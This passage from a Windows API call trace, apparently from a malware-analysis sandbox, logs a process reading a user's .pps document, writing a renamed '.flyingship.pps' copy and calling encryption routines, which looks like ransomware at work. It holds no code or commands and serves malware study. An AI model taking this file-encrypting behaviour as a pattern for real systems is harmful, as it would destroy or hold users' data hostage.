Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.223] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\iznb7dzlokqso_3s.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.224] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.224] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0179.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\iznb7dzlokqso_3s.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.227] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.227] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.227] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0179.227] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.227] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.227] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x5d90, lpOverlapped=0x0) returned 1 [0179.229] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5d90) returned 0xbea018 [0179.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.230] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.230] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.231] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.231] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.231] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.231] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.231] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.232] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.232] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.232] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2878, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2878*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0179.233] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.233] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0179.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.233] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0179.234] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.234] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.234] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0179.234] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.234] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.234] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.234] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.234] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.234] 